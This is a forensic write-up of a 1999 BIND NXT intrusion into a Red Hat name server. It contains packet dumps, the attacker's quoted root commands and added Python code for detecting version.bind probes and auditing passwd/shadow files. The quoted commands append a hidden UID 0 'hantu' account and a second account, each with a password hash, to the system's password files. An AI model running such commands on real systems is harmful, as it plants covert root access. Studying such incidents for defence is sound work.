Executive Summary
-----------------
On 26 April, at 06:43:05 the system 213.28.22.189
initiated a Named NXT attack on the NS running
RH 6.0.  The exploit was successful.  Upon gaining
root, the intruder ftp'd to another system, downloaded bj.c,
then installed the backdoor and made some
system modifications.  Two follow-on connections were
made from two other systems owned by the attacker.

On 9 May, our friend returns and installs Trinoo.

Detailed Write Up
-----------------
The attack, step by step.  Raw data can be found in
snort-0426@0005.log:

STEP 1 - Version Bind Query:
The reply to the version.bind query (TXT record, class CHAOS)
identifies the name server as BIND 8.2, a vulnerable version.
04/25-02:08:07.227412 63.226.81.13:4499 -> 172.16.1.107:53
UDP TTL:50 TOS:0x0 ID:23611 
Len: 38
9A 9A 01 80 00 01 00 00 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....

04/25-02:08:07.227891 172.16.1.107:53 -> 63.226.81.13:4499
UDP TTL:64 TOS:0x0 ID:18424 
Len: 66
9A 9A 85 80 00 01 00 01 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 07 56  sion.bind......V
45 52 53 49 4F 4E 04 42 49 4E 44 00 00 10 00 03  ERSION.BIND.....
00 00 00 00 00 04 03 38 2E 32                    .......8.2
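To show exactly what the two dumps above contain, here is an added example (not part of the original write-up) that decodes the UDP payloads transcribed from the hex into DNS header, question and answer sections, flags the version.bind/TXT/CHAOS probe that a detection rule would key on, and pulls the disclosed version string "8.2" out of the TXT answer. The parser is generic (it follows RFC 1035 name compression and decodes any TXT RDATA), so it also handles version.bind replies that are not on this page.

```python
import struct

# UDP payloads transcribed from the two snort dumps in Step 1 (the 8-byte
# UDP header is not part of the hex shown, so Len 38/66 = 8 + 30/58).
QUERY = bytes.fromhex(
    "9A 9A 01 80 00 01 00 00 00 00 00 00 07 76 65 72 "
    "73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03"
)
RESPONSE = bytes.fromhex(
    "9A 9A 85 80 00 01 00 01 00 00 00 00 07 76 65 72 "
    "73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 07 56 "
    "45 52 53 49 4F 4E 04 42 49 4E 44 00 00 10 00 03 "
    "00 00 00 00 00 04 03 38 2E 32"
)

TYPE_TXT = 0x0010     # RR type TXT
CLASS_CHAOS = 0x0003  # class CH; version.bind is served in CHAOS, not IN


def read_name(msg, off):
    """Decode a DNS name starting at msg[off]; follows compression pointers.
    Returns (dotted name, offset just after the name in the original stream)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # 2-byte pointer (RFC 1035 4.1.4)
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def decode_txt(rdata):
    """TXT RDATA is a sequence of <length byte><characters> strings."""
    out, i = [], 0
    while i < len(rdata):
        n = rdata[i]
        out.append(rdata[i + 1:i + 1 + n].decode("latin-1"))
        i += 1 + n
    return out


def parse_dns(msg):
    """Parse the header, question and answer sections of a DNS message."""
    ident, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    off = 12
    questions, answers = [], []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append({"name": name, "type": qtype, "class": qclass})
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        rec = {"name": name, "type": rtype, "class": rclass, "ttl": ttl, "rdata": rdata}
        if rtype == TYPE_TXT:
            rec["txt"] = decode_txt(rdata)
        answers.append(rec)
    return {"id": ident, "flags": flags, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def is_version_bind_probe(msg):
    """Detection: does the message carry the version.bind TXT/CH question?
    Both the probe and the server's reply (which echoes the question) match."""
    return any(q["name"].lower() == "version.bind"
               and q["type"] == TYPE_TXT and q["class"] == CLASS_CHAOS
               for q in parse_dns(msg)["questions"])


def bind_version(msg):
    """Version string the server disclosed, or None if no answer was given."""
    for rr in parse_dns(msg)["answers"]:
        if rr["name"].lower() == "version.bind" and "txt" in rr:
            return " ".join(rr["txt"])
    return None


if __name__ == "__main__":
    print("version.bind probe seen:", is_version_bind_probe(QUERY))
    print("named answered with version:", bind_version(RESPONSE))
```

The same probe is what a snort rule for version.bind matches on. On the server side, BIND's `options { version "..."; };` statement in named.conf replaces the disclosed string, which removes the easy fingerprint but is no substitute for running a patched named.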

STEP 2 - The Exploit
A lookup of r.rsavings.net is initiated, which triggers the exploit.
See exploit.txt for details of how the attack was run, including
actual packet traces.  Look for the "--- COMMENT: ----" lines
in exploit.txt for my own comments.  Also, read NXT-Howto.txt
on how the exploit works.

The following exploit commands were run on the victim as root (the
output of the first line is shown beneath it):

cd /; uname -a; pwd; id;
Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd
echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow

echo "hantu::0:0::/:/bin/bash" >> /etc/passwd
echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow


NOTE: hantu means 'ghost' in Indonesian.  Man, and I thought
learning the language would never benefit me :)
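The two pairs of echo lines above are what a defender has to catch after the fact. As an added example, not part of the original write-up, the following script audits passwd/shadow contents for exactly the traits those appended entries have: a UID 0 account that is not root, an empty password field in passwd on a shadowed system, a home directory of "/", shadow entries with no last-change date, and two accounts sharing one hash. It also diffs the account list against a known-good snapshot, which is the cheapest check of all. The root/bin/daemon/alice baseline entries and their hashes are constructed placeholders; only the twin and hantu lines are taken from the page.

```python
# Constructed /etc/passwd and /etc/shadow contents.  The root/bin/daemon/
# alice entries are assumed Red Hat 6.0-style baseline accounts with
# placeholder hashes (not from the page); the twin and hantu lines are the
# entries the exploit appended in Step 2, copied from the page.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
alice:x:500:500:Alice Example:/home/alice:/bin/bash
"""
BASELINE_SHADOW = """\
root:$1$placeholder$constructedRootHash:11000:0:99999:7:::
bin:*:11000:0:99999:7:::
daemon:*:11000:0:99999:7:::
alice:$1$placeholder$constructedAliceHash:11000:0:99999:7:::
"""
PASSWD_AFTER = BASELINE_PASSWD + """\
twin::506:506::/home/twin:/bin/bash
hantu::0:0::/:/bin/bash
"""
SHADOW_AFTER = BASELINE_SHADOW + """\
twin:w3nT2H0b6AjM2:::::::
hantu:w3nT2H0b6AjM2:::::::
"""


def added_accounts(baseline_passwd, current_passwd):
    """Account names present now but absent from a known-good snapshot."""
    def names(text):
        return {l.split(":")[0] for l in text.splitlines() if l.strip()}
    return names(current_passwd) - names(baseline_passwd)


def audit_accounts(passwd_text, shadow_text):
    """Return (account, reason) findings for entries that look hand-appended
    rather than created by useradd/passwd.  These are heuristics, not proof."""
    findings, passwd = [], {}
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            findings.append((f[0], "malformed passwd entry (%d fields)" % len(f)))
            continue
        name, pw, uid, _gid, _gecos, home, _shell = f
        passwd[name] = f
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field in passwd (expected 'x' on a shadowed system)"))
        if home in ("", "/"):
            findings.append((name, "home directory is %r" % home))

    shadow, by_hash = {}, {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 9:
            findings.append((f[0], "malformed shadow entry (%d fields)" % len(f)))
            continue
        name, h, lastchg = f[0], f[1], f[2]
        shadow[name] = f
        if name not in passwd:
            findings.append((name, "shadow entry with no passwd entry"))
        if h == "":
            findings.append((name, "empty hash in shadow (passwordless login)"))
        elif not h.startswith(("*", "!")):          # a real, unlocked hash
            by_hash.setdefault(h, []).append(name)
            if lastchg == "":
                findings.append((name, "no last-change date in shadow (useradd writes this field)"))

    for name in passwd:
        if name not in shadow:
            findings.append((name, "passwd entry with no shadow entry"))
    for names in by_hash.values():
        if len(names) > 1:
            for n in names:
                others = ", ".join(x for x in names if x != n)
                findings.append((n, "password hash identical to " + others))
    return findings


if __name__ == "__main__":
    print("accounts added:", sorted(added_accounts(BASELINE_PASSWD, PASSWD_AFTER)))
    for account, reason in audit_accounts(PASSWD_AFTER, SHADOW_AFTER):
        print("%-6s %s" % (account, reason))
```

Run against the real files the script would need root to read /etc/shadow; the snapshot diff works on any copy of /etc/passwd kept off the box, which is also where a host integrity checker would keep it.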


STEP 3 - Access and the Backdoor
The intruder telnets in from 213.28.22.189, gains access
and installs the backdoor bj.c.  See the actual telnet
keystrokes in directory 213.28.22.189.  Note the use of
'pico' to install the backdoor.  Also see the tools
directory for his goodies and .bash_history file.


Additional Files
----------------
213.28.22.189   Directory containing snort session breakout
                files for telnet connection to compromised
                system (keystrokes)
24.112.167.35   System ftp'd to for retrieval of goodies
62.161.85.30    Telneted back in, used backdoor
63.226.81.13    DNS server used to launch exploit
exploit.txt     Actual snort signatures from Named NXT exploit
NXT-Howto.txt   Black-hat HOWTO on the exploit, excellent reading!
snort.alert